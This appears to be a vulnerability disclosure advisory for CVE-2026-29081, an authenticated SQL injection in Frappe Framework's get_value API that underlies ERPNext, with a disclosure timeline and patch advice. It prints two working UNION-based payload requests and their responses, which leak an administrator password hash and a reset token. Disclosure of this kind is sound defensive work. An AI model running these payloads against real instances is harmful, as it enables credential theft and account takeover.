Introduction:
The Frappe Framework is a full stack web framework written in Python and JavaScript which is also the backend to ERPNext, a popular open-source Enterprise Resource Planning (ERP) platform. ERPNext is used by 30,000+ companies either locally hosted or as a Software as a Service (SaaS) offering by Frappe.
During some research, Cale discovered an authenticated SQL injection vulnerability in Frappe Framework, affecting the latest version of ERPNext, including cloud-hosted instances. The vulnerability could be used to leak sensitive information from the database including user password hashes and password reset tokens which could be used to compromise the application.
The vulnerability affects the following Frappe Framework Versions:
- <= 14.100.1
- 15.0.0 < 15.100.0
The vulnerability was assigned CVE-2026-29081 with a CVSS score of 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
The Vulnerability:
The fieldname parameter of the /api/method/frappe.client.get_value API endpoint was vulnerable to SQL injection due to insufficient sanitisation/parameterisation:
Any authenticated user could craft a malicious query to leak information from the database including password reset tokens, hashed passwords, and personal details.
The fieldname parameter could be escaped with a backtick (`) and arbitrary SQL could be injected with some conditions:
- The fieldname value had to match the allow list of valid field names for the doctype (e.g. name)
- The chosen fieldname had to also be a column in the table being leaked from
- The remainder of the query had to remain valid (no techniques were found to escape the rest of the query)
This could be exploited by extending the SELECT statements into querying different tables and using UNION statements to keep the syntax of the rest of the statement valid.
The payload and response below shows the hash of the Administrator account being leaked from Frappe's cloud demo app which could be cracked to take over the account:
GET /api/method/frappe.client.get_value?doctype=User&fieldname=name`,`password`+from+__Auth++where+name+like+%22Administrator%22+UNION+SELECT+`name`,`name&_=1770072146025
{"message":{"name":"Administrator","password":"$pbkdf2-sha256$29000$X8..."}}
The payload and response below shows a password reset token being leaked from the Frappe cloud demo app which could be used to reset the user’s password and take over the account:
GET /api/method/frappe.client.get_value?doctype=User&fieldname=name`,`reset_password_key`+from+tabUser+where+
name+like+"ne%"+UNION+SELECT+`name`,`name&_=1770072146025
{"message":{"name":"...@frappe.io","reset_password_key":"CE4..."}}
The vulnerability was tested against the following software:
- Frappe ERPNext 15.95.2
- Frappe Framework 15.98.1
- Frappe Cloud Demo App (https://erpnext-demo.frappe.cloud/app)
Recommendation:
All instances of software built on a vulnerable version of Frappe Framework should be updated to a fixed version.
Disclosure Timeline:
February 3rd, 2026: Issue reported to Frappe security team
February 11th, 2026: Issue acknowledged and private fix created
March 3rd, 2026: Draft security advisory issued
March 5th, 2026: Security advisory published and CVE-2026-29081 assigned